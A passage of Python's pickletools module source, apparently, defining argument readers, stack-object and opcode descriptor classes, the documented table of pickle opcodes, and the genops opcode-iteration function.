>>> read_long1(io.BytesIO(b"\x00"))
0
>>> read_long1(io.BytesIO(b"\x02\xff\x00"))
255
>>> read_long1(io.BytesIO(b"\x02\xff\x7f"))
32767
>>> read_long1(io.BytesIO(b"\x02\x00\xff"))
-256
>>> read_long1(io.BytesIO(b"\x02\x00\x80"))
-32768
"""
n = read_uint1(f)
data = f.read(n)
if len(data) != n:
raise ValueError("not enough data in stream to read long1")
return decode_long(data)
long1 = ArgumentDescriptor(
name="long1",
n=TAKEN_FROM_ARGUMENT1,
reader=read_long1,
doc="""A binary long, little-endian, using 1-byte size.
This first reads one byte as an unsigned size, then reads that
many bytes and interprets them as a little-endian 2's-complement long.
If the size is 0, that's taken as a shortcut for the long 0L.
""")
def read_long4(f):
r"""
>>> import io
>>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\xff\x00"))
255
>>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\xff\x7f"))
32767
>>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\x00\xff"))
-256
>>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\x00\x80"))
-32768
>>> read_long1(io.BytesIO(b"\x00\x00\x00\x00"))
0
"""
n = read_int4(f)
if n < 0:
raise ValueError("long4 byte count < 0: %d" % n)
data = f.read(n)
if len(data) != n:
raise ValueError("not enough data in stream to read long4")
return decode_long(data)
long4 = ArgumentDescriptor(
name="long4",
n=TAKEN_FROM_ARGUMENT4,
reader=read_long4,
doc="""A binary representation of a long, little-endian.
This first reads four bytes as a signed size (but requires the
size to be >= 0), then reads that many bytes and interprets them
as a little-endian 2's-complement long. If the size is 0, that's taken
as a shortcut for the int 0, although LONG1 should really be used
then instead (and in any case where # of bytes < 256).
""")
class StackObject(object):
__slots__ = (
# name of descriptor record, for info only
'name',
# type of object, or tuple of type objects (meaning the object can
# be of any type in the tuple)
'obtype',
# human-readable docs for this kind of stack object; a string
'doc',
)
def __init__(self, name, obtype, doc):
assert isinstance(name, str)
self.name = name
assert isinstance(obtype, type) or isinstance(obtype, tuple)
if isinstance(obtype, tuple):
for contained in obtype:
assert isinstance(contained, type)
self.obtype = obtype
assert isinstance(doc, str)
self.doc = doc
def __repr__(self):
return self.name
pyint = pylong = StackObject(
name='int',
obtype=int,
doc="A Python integer object.")
pyinteger_or_bool = StackObject(
name='int_or_bool',
obtype=(int, bool),
doc="A Python integer or boolean object.")
pybool = StackObject(
name='bool',
obtype=bool,
doc="A Python boolean object.")
pyfloat = StackObject(
name='float',
obtype=float,
doc="A Python float object.")
pybytes_or_str = pystring = StackObject(
name='bytes_or_str',
obtype=(bytes, str),
doc="A Python bytes or (Unicode) string object.")
pybytes = StackObject(
name='bytes',
obtype=bytes,
doc="A Python bytes object.")
pyunicode = StackObject(
name='str',
obtype=str,
doc="A Python (Unicode) string object.")
pynone = StackObject(
name="None",
obtype=type(None),
doc="The Python None object.")
pytuple = StackObject(
name="tuple",
obtype=tuple,
doc="A Python tuple object.")
pylist = StackObject(
name="list",
obtype=list,
doc="A Python list object.")
pydict = StackObject(
name="dict",
obtype=dict,
doc="A Python dict object.")
pyset = StackObject(
name="set",
obtype=set,
doc="A Python set object.")
pyfrozenset = StackObject(
name="frozenset",
obtype=frozenset,
doc="A Python frozenset object.")
anyobject = StackObject(
name='any',
obtype=object,
doc="Any kind of object whatsoever.")
markobject = StackObject(
name="mark",
obtype=StackObject,
doc="""'The mark' is a unique object.
Opcodes that operate on a variable number of objects
generally don't embed the count of objects in the opcode,
or pull it off the stack. Instead the MARK opcode is used
to push a special marker object on the stack, and then
some other opcodes grab all the objects from the top of
the stack down to (but not including) the topmost marker
object.
""")
stackslice = StackObject(
name="stackslice",
obtype=StackObject,
doc="""An object representing a contiguous slice of the stack.
This is used in conjunction with markobject, to represent all
of the stack following the topmost markobject. For example,
the POP_MARK opcode changes the stack from
[..., markobject, stackslice]
to
[...]
No matter how many objects are on the stack after the topmost
markobject, POP_MARK gets rid of all of them (including the
topmost markobject too).
""")
class OpcodeInfo(object):
__slots__ = (
# symbolic name of opcode; a string
'name',
# the code used in a bytestream to represent the opcode; a
# one-character string
'code',
# If the opcode has an argument embedded in the byte string, an
# instance of ArgumentDescriptor specifying its type. Note that
# arg.reader(s) can be used to read and decode the argument from
# the bytestream s, and arg.doc documents the format of the raw
# argument bytes. If the opcode doesn't have an argument embedded
# in the bytestream, arg should be None.
'arg',
# what the stack looks like before this opcode runs; a list
'stack_before',
# what the stack looks like after this opcode runs; a list
'stack_after',
# the protocol number in which this opcode was introduced; an int
'proto',
# human-readable docs for this opcode; a string
'doc',
)
def __init__(self, name, code, arg,
stack_before, stack_after, proto, doc):
assert isinstance(name, str)
self.name = name
assert isinstance(code, str)
assert len(code) == 1
self.code = code
assert arg is None or isinstance(arg, ArgumentDescriptor)
self.arg = arg
assert isinstance(stack_before, list)
for x in stack_before:
assert isinstance(x, StackObject)
self.stack_before = stack_before
assert isinstance(stack_after, list)
for x in stack_after:
assert isinstance(x, StackObject)
self.stack_after = stack_after
assert isinstance(proto, int) and 0 <= proto <= pickle.HIGHEST_PROTOCOL
self.proto = proto
assert isinstance(doc, str)
self.doc = doc
I = OpcodeInfo
opcodes = [
# Ways to spell integers.
I(name='INT',
code='I',
arg=decimalnl_short,
stack_before=[],
stack_after=[pyinteger_or_bool],
proto=0,
doc="""Push an integer or bool.
The argument is a newline-terminated decimal literal string.
The intent may have been that this always fit in a short Python int,
but INT can be generated in pickles written on a 64-bit box that
require a Python long on a 32-bit box. The difference between this
and LONG then is that INT skips a trailing 'L', and produces a short
int whenever possible.
Another difference arises because, when bool was introduced as a
distinct type in 2.3, builtin names True and False were also added to
2.2.2, mapping to ints 1 and 0. For compatibility in both directions,
True gets pickled as INT + "I01\\n", and False as INT + "I00\\n".
Leading zeroes are never produced for a genuine integer. The 2.3
(and later) unpicklers special-case these and return bool instead;
earlier unpicklers ignore the leading "0" and return the int.
"""),
I(name='BININT',
code='J',
arg=int4,
stack_before=[],
stack_after=[pyint],
proto=1,
doc="""Push a four-byte signed integer.
This handles the full range of Python (short) integers on a 32-bit
box, directly as binary bytes (1 for the opcode and 4 for the integer).
If the integer is non-negative and fits in 1 or 2 bytes, pickling via
BININT1 or BININT2 saves space.
"""),
I(name='BININT1',
code='K',
arg=uint1,
stack_before=[],
stack_after=[pyint],
proto=1,
doc="""Push a one-byte unsigned integer.
This is a space optimization for pickling very small non-negative ints,
in range(256).
"""),
I(name='BININT2',
code='M',
arg=uint2,
stack_before=[],
stack_after=[pyint],
proto=1,
doc="""Push a two-byte unsigned integer.
This is a space optimization for pickling small positive ints, in
range(256, 2**16). Integers in range(256) can also be pickled via
BININT2, but BININT1 instead saves a byte.
"""),
I(name='LONG',
code='L',
arg=decimalnl_long,
stack_before=[],
stack_after=[pyint],
proto=0,
doc="""Push a long integer.
The same as INT, except that the literal ends with 'L', and always
unpickles to a Python long. There doesn't seem to be a real purpose to the
trailing 'L'.
Note that LONG takes time quadratic in the number of digits when
unpickling (this is simply due to the nature of decimal->binary
conversion). Proto 2 added linear-time (in C; still quadratic-time
in Python) LONG1 and LONG4 opcodes.
"""),
I(name="LONG1",
code='\x8a',
arg=long1,
stack_before=[],
stack_after=[pyint],
proto=2,
doc="""Long integer using one-byte length.
A more efficient encoding of a Python long; the long1 encoding
says it all."""),
I(name="LONG4",
code='\x8b',
arg=long4,
stack_before=[],
stack_after=[pyint],
proto=2,
doc="""Long integer using found-byte length.
A more efficient encoding of a Python long; the long4 encoding
says it all."""),
# Ways to spell strings (8-bit, not Unicode).
I(name='STRING',
code='S',
arg=stringnl,
stack_before=[],
stack_after=[pybytes_or_str],
proto=0,
doc="""Push a Python string object.
The argument is a repr-style string, with bracketing quote characters,
and perhaps embedded escapes. The argument extends until the next
newline character. These are usually decoded into a str instance
using the encoding given to the Unpickler constructor, or the default,
'ASCII'. If the encoding given was 'bytes', however, they will be
decoded as a bytes object instead.
"""),
I(name='BINSTRING',
code='T',
arg=string4,
stack_before=[],
stack_after=[pybytes_or_str],
proto=1,
doc="""Push a Python string object.
There are two arguments: the first is a 4-byte little-endian
signed int giving the number of bytes in the string, and the
second is that many bytes, which are taken literally as the string
content. These are usually decoded into a str instance using the
encoding given to the Unpickler constructor, or the default,
'ASCII'. If the encoding given was 'bytes', however, they will be
decoded as a bytes object instead.
"""),
I(name='SHORT_BINSTRING',
code='U',
arg=string1,
stack_before=[],
stack_after=[pybytes_or_str],
proto=1,
doc="""Push a Python string object.
There are two arguments: the first is a 1-byte unsigned int giving
the number of bytes in the string, and the second is that many
bytes, which are taken literally as the string content. These are
usually decoded into a str instance using the encoding given to
the Unpickler constructor, or the default, 'ASCII'. If the
encoding given was 'bytes', however, they will be decoded as a
bytes object instead.
"""),
# Bytes (protocol 3 only; older protocols don't support bytes at all)
I(name='BINBYTES',
code='B',
arg=bytes4,
stack_before=[],
stack_after=[pybytes],
proto=3,
doc="""Push a Python bytes object.
There are two arguments: the first is a 4-byte little-endian unsigned int
giving the number of bytes, and the second is that many bytes, which are
taken literally as the bytes content.
"""),
I(name='SHORT_BINBYTES',
code='C',
arg=bytes1,
stack_before=[],
stack_after=[pybytes],
proto=3,
doc="""Push a Python bytes object.
There are two arguments: the first is a 1-byte unsigned int giving
the number of bytes, and the second is that many bytes, which are taken
literally as the bytes content.
"""),
I(name='BINBYTES8',
code='\x8e',
arg=bytes8,
stack_before=[],
stack_after=[pybytes],
proto=4,
doc="""Push a Python bytes object.
There are two arguments: the first is an 8-byte unsigned int giving
the number of bytes, and the second is that many bytes,
which are taken literally as the bytes content.
"""),
# Ways to spell None.
I(name='NONE',
code='N',
arg=None,
stack_before=[],
stack_after=[pynone],
proto=0,
doc="Push None on the stack."),
# Ways to spell bools, starting with proto 2. See INT for how this was
# done before proto 2.
I(name='NEWTRUE',
code='\x88',
arg=None,
stack_before=[],
stack_after=[pybool],
proto=2,
doc="""True.
Push True onto the stack."""),
I(name='NEWFALSE',
code='\x89',
arg=None,
stack_before=[],
stack_after=[pybool],
proto=2,
doc="""True.
Push False onto the stack."""),
# Ways to spell Unicode strings.
I(name='UNICODE',
code='V',
arg=unicodestringnl,
stack_before=[],
stack_after=[pyunicode],
proto=0, # this may be pure-text, but it's a later addition
doc="""Push a Python Unicode string object.
The argument is a raw-unicode-escape encoding of a Unicode string,
and so may contain embedded escape sequences. The argument extends
until the next newline character.
"""),
I(name='SHORT_BINUNICODE',
code='\x8c',
arg=unicodestring1,
stack_before=[],
stack_after=[pyunicode],
proto=4,
doc="""Push a Python Unicode string object.
There are two arguments: the first is a 1-byte unsigned int
giving the number of bytes in the string. The second is that many
bytes, and is the UTF-8 encoding of the Unicode string.
"""),
I(name='BINUNICODE',
code='X',
arg=unicodestring4,
stack_before=[],
stack_after=[pyunicode],
proto=1,
doc="""Push a Python Unicode string object.
There are two arguments: the first is a 4-byte little-endian unsigned int
giving the number of bytes in the string. The second is that many
bytes, and is the UTF-8 encoding of the Unicode string.
"""),
I(name='BINUNICODE8',
code='\x8d',
arg=unicodestring8,
stack_before=[],
stack_after=[pyunicode],
proto=4,
doc="""Push a Python Unicode string object.
There are two arguments: the first is an 8-byte little-endian unsigned int
giving the number of bytes in the string. The second is that many
bytes, and is the UTF-8 encoding of the Unicode string.
"""),
# Ways to spell floats.
I(name='FLOAT',
code='F',
arg=floatnl,
stack_before=[],
stack_after=[pyfloat],
proto=0,
doc="""Newline-terminated decimal float literal.
The argument is repr(a_float), and in general requires 17 significant
digits for roundtrip conversion to be an identity (this is so for
IEEE-754 double precision values, which is what Python float maps to
on most boxes).
In general, FLOAT cannot be used to transport infinities, NaNs, or
minus zero across boxes (or even on a single box, if the platform C
library can't read the strings it produces for such things -- Windows
is like that), but may do less damage than BINFLOAT on boxes with
greater precision or dynamic range than IEEE-754 double.
"""),
I(name='BINFLOAT',
code='G',
arg=float8,
stack_before=[],
stack_after=[pyfloat],
proto=1,
doc="""Float stored in binary form, with 8 bytes of data.
This generally requires less than half the space of FLOAT encoding.
In general, BINFLOAT cannot be used to transport infinities, NaNs, or
minus zero, raises an exception if the exponent exceeds the range of
an IEEE-754 double, and retains no more than 53 bits of precision (if
there are more than that, "add a half and chop" rounding is used to
cut it back to 53 significant bits).
"""),
# Ways to build lists.
I(name='EMPTY_LIST',
code=']',
arg=None,
stack_before=[],
stack_after=[pylist],
proto=1,
doc="Push an empty list."),
I(name='APPEND',
code='a',
arg=None,
stack_before=[pylist, anyobject],
stack_after=[pylist],
proto=0,
doc="""Append an object to a list.
Stack before: ... pylist anyobject
Stack after: ... pylist+[anyobject]
although pylist is really extended in-place.
"""),
I(name='APPENDS',
code='e',
arg=None,
stack_before=[pylist, markobject, stackslice],
stack_after=[pylist],
proto=1,
doc="""Extend a list by a slice of stack objects.
Stack before: ... pylist markobject stackslice
Stack after: ... pylist+stackslice
although pylist is really extended in-place.
"""),
I(name='LIST',
code='l',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pylist],
proto=0,
doc="""Build a list out of the topmost stack slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python list, which single list object replaces all of the
stack from the topmost markobject onward. For example,
Stack before: ... markobject 1 2 3 'abc'
Stack after: ... [1, 2, 3, 'abc']
"""),
# Ways to build tuples.
I(name='EMPTY_TUPLE',
code=')',
arg=None,
stack_before=[],
stack_after=[pytuple],
proto=1,
doc="Push an empty tuple."),
I(name='TUPLE',
code='t',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pytuple],
proto=0,
doc="""Build a tuple out of the topmost stack slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python tuple, which single tuple object replaces all of the
stack from the topmost markobject onward. For example,
Stack before: ... markobject 1 2 3 'abc'
Stack after: ... (1, 2, 3, 'abc')
"""),
I(name='TUPLE1',
code='\x85',
arg=None,
stack_before=[anyobject],
stack_after=[pytuple],
proto=2,
doc="""Build a one-tuple out of the topmost item on the stack.
This code pops one value off the stack and pushes a tuple of
length 1 whose one item is that value back onto it. In other
words:
stack[-1] = tuple(stack[-1:])
"""),
I(name='TUPLE2',
code='\x86',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[pytuple],
proto=2,
doc="""Build a two-tuple out of the top two items on the stack.
This code pops two values off the stack and pushes a tuple of
length 2 whose items are those values back onto it. In other
words:
stack[-2:] = [tuple(stack[-2:])]
"""),
I(name='TUPLE3',
code='\x87',
arg=None,
stack_before=[anyobject, anyobject, anyobject],
stack_after=[pytuple],
proto=2,
doc="""Build a three-tuple out of the top three items on the stack.
This code pops three values off the stack and pushes a tuple of
length 3 whose items are those values back onto it. In other
words:
stack[-3:] = [tuple(stack[-3:])]
"""),
# Ways to build dicts.
I(name='EMPTY_DICT',
code='}',
arg=None,
stack_before=[],
stack_after=[pydict],
proto=1,
doc="Push an empty dict."),
I(name='DICT',
code='d',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pydict],
proto=0,
doc="""Build a dict out of the topmost stack slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python dict, which single dict object replaces all of the
stack from the topmost markobject onward. The stack slice alternates
key, value, key, value, .... For example,
Stack before: ... markobject 1 2 3 'abc'
Stack after: ... {1: 2, 3: 'abc'}
"""),
I(name='SETITEM',
code='s',
arg=None,
stack_before=[pydict, anyobject, anyobject],
stack_after=[pydict],
proto=0,
doc="""Add a key+value pair to an existing dict.
Stack before: ... pydict key value
Stack after: ... pydict
where pydict has been modified via pydict[key] = value.
"""),
I(name='SETITEMS',
code='u',
arg=None,
stack_before=[pydict, markobject, stackslice],
stack_after=[pydict],
proto=1,
doc="""Add an arbitrary number of key+value pairs to an existing dict.
The slice of the stack following the topmost markobject is taken as
an alternating sequence of keys and values, added to the dict
immediately under the topmost markobject. Everything at and after the
topmost markobject is popped, leaving the mutated dict at the top
of the stack.
Stack before: ... pydict markobject key_1 value_1 ... key_n value_n
Stack after: ... pydict
where pydict has been modified via pydict[key_i] = value_i for i in
1, 2, ..., n, and in that order.
"""),
# Ways to build sets
I(name='EMPTY_SET',
code='\x8f',
arg=None,
stack_before=[],
stack_after=[pyset],
proto=4,
doc="Push an empty set."),
I(name='ADDITEMS',
code='\x90',
arg=None,
stack_before=[pyset, markobject, stackslice],
stack_after=[pyset],
proto=4,
doc="""Add an arbitrary number of items to an existing set.
The slice of the stack following the topmost markobject is taken as
a sequence of items, added to the set immediately under the topmost
markobject. Everything at and after the topmost markobject is popped,
leaving the mutated set at the top of the stack.
Stack before: ... pyset markobject item_1 ... item_n
Stack after: ... pyset
where pyset has been modified via pyset.add(item_i) for i in
1, 2, ..., n, and in that order.
"""),
# Way to build frozensets
I(name='FROZENSET',
code='\x91',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pyfrozenset],
proto=4,
doc="""Build a frozenset out of the topmost slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python frozenset, which single frozenset object replaces all
of the stack from the topmost markobject onward. For example,
Stack before: ... markobject 1 2 3
Stack after: ... frozenset({1, 2, 3})
"""),
# Stack manipulation.
I(name='POP',
code='0',
arg=None,
stack_before=[anyobject],
stack_after=[],
proto=0,
doc="Discard the top stack item, shrinking the stack by one item."),
I(name='DUP',
code='2',
arg=None,
stack_before=[anyobject],
stack_after=[anyobject, anyobject],
proto=0,
doc="Push the top stack item onto the stack again, duplicating it."),
I(name='MARK',
code='(',
arg=None,
stack_before=[],
stack_after=[markobject],
proto=0,
doc="""Push markobject onto the stack.
markobject is a unique object, used by other opcodes to identify a
region of the stack containing a variable number of objects for them
to work on. See markobject.doc for more detail.
"""),
I(name='POP_MARK',
code='1',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[],
proto=1,
doc="""Pop all the stack objects at and above the topmost markobject.
When an opcode using a variable number of stack objects is done,
POP_MARK is used to remove those objects, and to remove the markobject
that delimited their starting position on the stack.
"""),
# Memo manipulation. There are really only two operations (get and put),
# each in all-text, "short binary", and "long binary" flavors.
I(name='GET',
code='g',
arg=decimalnl_short,
stack_before=[],
stack_after=[anyobject],
proto=0,
doc="""Read an object from the memo and push it on the stack.
The index of the memo object to push is given by the newline-terminated
decimal string following. BINGET and LONG_BINGET are space-optimized
versions.
"""),
I(name='BINGET',
code='h',
arg=uint1,
stack_before=[],
stack_after=[anyobject],
proto=1,
doc="""Read an object from the memo and push it on the stack.
The index of the memo object to push is given by the 1-byte unsigned
integer following.
"""),
I(name='LONG_BINGET',
code='j',
arg=uint4,
stack_before=[],
stack_after=[anyobject],
proto=1,
doc="""Read an object from the memo and push it on the stack.
The index of the memo object to push is given by the 4-byte unsigned
little-endian integer following.
"""),
I(name='PUT',
code='p',
arg=decimalnl_short,
stack_before=[],
stack_after=[],
proto=0,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write into is given by the newline-
terminated decimal string following. BINPUT and LONG_BINPUT are
space-optimized versions.
"""),
I(name='BINPUT',
code='q',
arg=uint1,
stack_before=[],
stack_after=[],
proto=1,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write into is given by the 1-byte
unsigned integer following.
"""),
I(name='LONG_BINPUT',
code='r',
arg=uint4,
stack_before=[],
stack_after=[],
proto=1,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write into is given by the 4-byte
unsigned little-endian integer following.
"""),
I(name='MEMOIZE',
code='\x94',
arg=None,
stack_before=[anyobject],
stack_after=[anyobject],
proto=4,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write is the number of
elements currently present in the memo.
"""),
# Access the extension registry (predefined objects). Akin to the GET
# family.
I(name='EXT1',
code='\x82',
arg=uint1,
stack_before=[],
stack_after=[anyobject],
proto=2,
doc="""Extension code.
This code and the similar EXT2 and EXT4 allow using a registry
of popular objects that are pickled by name, typically classes.
It is envisioned that through a global negotiation and
registration process, third parties can set up a mapping between
ints and object names.
In order to guarantee pickle interchangeability, the extension
code registry ought to be global, although a range of codes may
be reserved for private use.
EXT1 has a 1-byte integer argument. This is used to index into the
extension registry, and the object at that index is pushed on the stack.
"""),
I(name='EXT2',
code='\x83',
arg=uint2,
stack_before=[],
stack_after=[anyobject],
proto=2,
doc="""Extension code.
See EXT1. EXT2 has a two-byte integer argument.
"""),
I(name='EXT4',
code='\x84',
arg=int4,
stack_before=[],
stack_after=[anyobject],
proto=2,
doc="""Extension code.
See EXT1. EXT4 has a four-byte integer argument.
"""),
# Push a class object, or module function, on the stack, via its module
# and name.
I(name='GLOBAL',
code='c',
arg=stringnl_noescape_pair,
stack_before=[],
stack_after=[anyobject],
proto=0,
doc="""Push a global object (module.attr) on the stack.
Two newline-terminated strings follow the GLOBAL opcode. The first is
taken as a module name, and the second as a class name. The class
object module.class is pushed on the stack. More accurately, the
object returned by self.find_class(module, class) is pushed on the
stack, so unpickling subclasses can override this form of lookup.
"""),
I(name='STACK_GLOBAL',
code='\x93',
arg=None,
stack_before=[pyunicode, pyunicode],
stack_after=[anyobject],
proto=4,
doc="""Push a global object (module.attr) on the stack.
"""),
# Ways to build objects of classes pickle doesn't know about directly
# (user-defined classes). I despair of documenting this accurately
# and comprehensibly -- you really have to read the pickle code to
# find all the special cases.
I(name='REDUCE',
code='R',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[anyobject],
proto=0,
doc="""Push an object built from a callable and an argument tuple.
The opcode is named to remind of the __reduce__() method.
Stack before: ... callable pytuple
Stack after: ... callable(*pytuple)
The callable and the argument tuple are the first two items returned
by a __reduce__ method. Applying the callable to the argtuple is
supposed to reproduce the original object, or at least get it started.
If the __reduce__ method returns a 3-tuple, the last component is an
argument to be passed to the object's __setstate__, and then the REDUCE
opcode is followed by code to create setstate's argument, and then a
BUILD opcode to apply __setstate__ to that argument.
If not isinstance(callable, type), REDUCE complains unless the
callable has been registered with the copyreg module's
safe_constructors dict, or the callable has a magic
'__safe_for_unpickling__' attribute with a true value. I'm not sure
why it does this, but I've sure seen this complaint often enough when
I didn't want to <wink>.
"""),
I(name='BUILD',
code='b',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[anyobject],
proto=0,
doc="""Finish building an object, via __setstate__ or dict update.
Stack before: ... anyobject argument
Stack after: ... anyobject
where anyobject may have been mutated, as follows:
If the object has a __setstate__ method,
anyobject.__setstate__(argument)
is called.
Else the argument must be a dict, the object must have a __dict__, and
the object is updated via
anyobject.__dict__.update(argument)
"""),
I(name='INST',
code='i',
arg=stringnl_noescape_pair,
stack_before=[markobject, stackslice],
stack_after=[anyobject],
proto=0,
doc="""Build a class instance.
This is the protocol 0 version of protocol 1's OBJ opcode.
INST is followed by two newline-terminated strings, giving a
module and class name, just as for the GLOBAL opcode (and see
GLOBAL for more details about that). self.find_class(module, name)
is used to get a class object.
In addition, all the objects on the stack following the topmost
markobject are gathered into a tuple and popped (along with the
topmost markobject), just as for the TUPLE opcode.
Now it gets complicated. If all of these are true:
+ The argtuple is empty (markobject was at the top of the stack
at the start).
+ The class object does not have a __getinitargs__ attribute.
then we want to create an old-style class instance without invoking
its __init__() method (pickle has waffled on this over the years; not
calling __init__() is current wisdom). In this case, an instance of
an old-style dummy class is created, and then we try to rebind its
__class__ attribute to the desired class object. If this succeeds,
the new instance object is pushed on the stack, and we're done.
Else (the argtuple is not empty, it's not an old-style class object,
or the class object does have a __getinitargs__ attribute), the code
first insists that the class object have a __safe_for_unpickling__
attribute. Unlike as for the __safe_for_unpickling__ check in REDUCE,
it doesn't matter whether this attribute has a true or false value, it
only matters whether it exists (XXX this is a bug). If
__safe_for_unpickling__ doesn't exist, UnpicklingError is raised.
Else (the class object does have a __safe_for_unpickling__ attr),
the class object obtained from INST's arguments is applied to the
argtuple obtained from the stack, and the resulting instance object
is pushed on the stack.
NOTE: checks for __safe_for_unpickling__ went away in Python 2.3.
NOTE: the distinction between old-style and new-style classes does
not make sense in Python 3.
"""),
I(name='OBJ',
code='o',
arg=None,
stack_before=[markobject, anyobject, stackslice],
stack_after=[anyobject],
proto=1,
doc="""Build a class instance.
This is the protocol 1 version of protocol 0's INST opcode, and is
very much like it. The major difference is that the class object
is taken off the stack, allowing it to be retrieved from the memo
repeatedly if several instances of the same class are created. This
can be much more efficient (in both time and space) than repeatedly
embedding the module and class names in INST opcodes.
Unlike INST, OBJ takes no arguments from the opcode stream. Instead
the class object is taken off the stack, immediately above the
topmost markobject:
Stack before: ... markobject classobject stackslice
Stack after: ... new_instance_object
As for INST, the remainder of the stack above the markobject is
gathered into an argument tuple, and then the logic seems identical,
except that no __safe_for_unpickling__ check is done (XXX this is
a bug). See INST for the gory details.
NOTE: In Python 2.3, INST and OBJ are identical except for how they
get the class object. That was always the intent; the implementations
had diverged for accidental reasons.
"""),
I(name='NEWOBJ',
code='\x81',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[anyobject],
proto=2,
doc="""Build an object instance.
The stack before should be thought of as containing a class
object followed by an argument tuple (the tuple being the stack
top). Call these cls and args. They are popped off the stack,
and the value returned by cls.__new__(cls, *args) is pushed back
onto the stack.
"""),
I(name='NEWOBJ_EX',
code='\x92',
arg=None,
stack_before=[anyobject, anyobject, anyobject],
stack_after=[anyobject],
proto=4,
doc="""Build an object instance.
The stack before should be thought of as containing a class
object followed by an argument tuple and by a keyword argument dict
(the dict being the stack top). Call these cls, args, and kwargs.
They are popped off the stack, and the value returned by
cls.__new__(cls, *args, **kwargs) is pushed back onto the stack.
"""),
# Machine control.
I(name='PROTO',
code='\x80',
arg=uint1,
stack_before=[],
stack_after=[],
proto=2,
doc="""Protocol version indicator.
For protocol 2 and above, a pickle must start with this opcode.
The argument is the protocol version, an int in range(2, 256).
"""),
I(name='STOP',
code='.',
arg=None,
stack_before=[anyobject],
stack_after=[],
proto=0,
doc="""Stop the unpickling machine.
Every pickle ends with this opcode. The object at the top of the stack
is popped, and that's the result of unpickling. The stack should be
empty then.
"""),
# Framing support.
I(name='FRAME',
code='\x95',
arg=uint8,
stack_before=[],
stack_after=[],
proto=4,
doc="""Indicate the beginning of a new frame.
The unpickler may use this opcode to safely prefetch data from its
underlying stream.
"""),
# Ways to deal with persistent IDs.
I(name='PERSID',
code='P',
arg=stringnl_noescape,
stack_before=[],
stack_after=[anyobject],
proto=0,
doc="""Push an object identified by a persistent ID.
The pickle module doesn't define what a persistent ID means. PERSID's
argument is a newline-terminated str-style (no embedded escapes, no
bracketing quote characters) string, which *is* "the persistent ID".
The unpickler passes this string to self.persistent_load(). Whatever
object that returns is pushed on the stack. There is no implementation
of persistent_load() in Python's unpickler: it must be supplied by an
unpickler subclass.
"""),
I(name='BINPERSID',
code='Q',
arg=None,
stack_before=[anyobject],
stack_after=[anyobject],
proto=1,
doc="""Push an object identified by a persistent ID.
Like PERSID, except the persistent ID is popped off the stack (instead
of being a string embedded in the opcode bytestream). The persistent
ID is passed to self.persistent_load(), and whatever object that
returns is pushed on the stack. See PERSID for more detail.
"""),
]
del I
name2i = {}
code2i = {}
for i, d in enumerate(opcodes):
if d.name in name2i:
raise ValueError("repeated name %r at indices %d and %d" %
(d.name, name2i[d.name], i))
if d.code in code2i:
raise ValueError("repeated code %r at indices %d and %d" %
(d.code, code2i[d.code], i))
name2i[d.name] = i
code2i[d.code] = i
del name2i, code2i, i, d
code2op = {}
for d in opcodes:
code2op[d.code] = d
del d
def assure_pickle_consistency(verbose=False):
copy = code2op.copy()
for name in pickle.__all__:
if not re.match("[A-Z][A-Z0-9_]+$", name):
if verbose:
print("skipping %r: it doesn't look like an opcode name" % name)
continue
picklecode = getattr(pickle, name)
if not isinstance(picklecode, bytes) or len(picklecode) != 1:
if verbose:
print(("skipping %r: value %r doesn't look like a pickle "
"code" % (name, picklecode)))
continue
picklecode = picklecode.decode("latin-1")
if picklecode in copy:
if verbose:
print("checking name %r w/ code %r for consistency" % (
name, picklecode))
d = copy[picklecode]
if d.name != name:
raise ValueError("for pickle code %r, pickle.py uses name %r "
"but we're using name %r" % (picklecode,
name,
d.name))
# Forget this one. Any left over in copy at the end are a problem
# of a different kind.
del copy[picklecode]
else:
raise ValueError("pickle.py appears to have a pickle opcode with "
"name %r and code %r, but we don't" %
(name, picklecode))
if copy:
msg = ["we appear to have pickle opcodes that pickle.py doesn't have:"]
for code, d in copy.items():
msg.append(" name %r with code %r" % (d.name, code))
raise ValueError("\n".join(msg))
assure_pickle_consistency()
del assure_pickle_consistency
def _genops(data, yield_end_pos=False):
if isinstance(data, bytes_types):
data = io.BytesIO(data)
if hasattr(data, "tell"):
getpos = data.tell
else:
getpos = lambda: None
while True:
pos = getpos()
code = data.read(1)
opcode = code2op.get(code.decode("latin-1"))
if opcode is None:
if code == b"":
raise ValueError("pickle exhausted before seeing STOP")
else:
raise ValueError("at position %s, opcode %r unknown" % (
"<unknown>" if pos is None else pos,
code))
if opcode.arg is None:
arg = None
else:
arg = opcode.arg.reader(data)
if yield_end_pos:
yield opcode, arg, pos, getpos()
else:
yield opcode, arg, pos
if code == b'.':
assert opcode.name == 'STOP'
break
def genops(pickle):
"""Generate all the opcodes in a pickle.
'pickle' is a file-like object, or string, containing the pickle.
Each opcode in the pickle is generated, from the current pickle position,
stopping after a STOP opcode is delivered. A triple is generated for
each opcode:
opcode, arg, pos
opcode is an OpcodeInfo record, describing the current opcode.
If the opcode has an argument embedded in the pickle, arg is its decoded
value, as a Python object. If the opcode doesn't have an argument, arg
is None.
If the pickle has a tell() method, pos was the value of pickle.tell()
before reading the current opcode. If the pickle is a bytes object,
it's wrapped in a BytesIO object, and the latter's tell() result is
used. Else (the pickle doesn't have a tell(), and it's not obvious how
to query its current position) pos is None.
"""
return _genops(pickle)
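# A minimal usage sketch (illustrative; the opcodes printed depend on the
# object pickled and the protocol used):
#
#     import pickle
#     for opcode, arg, pos in genops(pickle.dumps([1, 2])):
#         print(pos, opcode.name, arg)
#
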